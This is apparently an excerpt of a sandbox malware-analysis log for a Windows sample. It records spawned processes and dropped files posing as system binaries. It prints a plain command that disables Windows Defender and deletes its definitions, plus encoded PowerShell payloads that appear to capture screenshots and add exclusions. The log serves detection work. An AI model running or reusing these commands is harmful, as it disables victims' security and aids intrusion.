                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazabtacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahuaawbpacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajageabgbiacmapgagac0argbvahiaywblacaapaajahkabab5acmapga="
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkaaqbqacmapgbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajahiacgbwacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccazqbyahiabwbyadoaiablahgacablagmadablagqaiaanaccaowanaccaiabiaguazgbvahiazqagaccajwbyaguadab1ahiabganaccajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajaggaegb5acmapga="Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazabtacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahuaawbpacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajageabgbiacmapgagac0argbvahiaywblacaapaajahkabab5acmapga="Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B078880 cpuid 5_2_00007FF72B078880
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: GetLocaleInfoW,GetNumberFormatW,13_2_00B5D0AB
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: GetLocaleInfoW,GetNumberFormatW,21_2_0056AF0F
                                  Source: C:\ProgramData\svchost.exeCode function: GetLocaleInfoW,GetNumberFormatW,29_2_0067AF0F
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeQueries volume information: C:\Users\user\Desktop\87Bym0x4Fy.exe VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
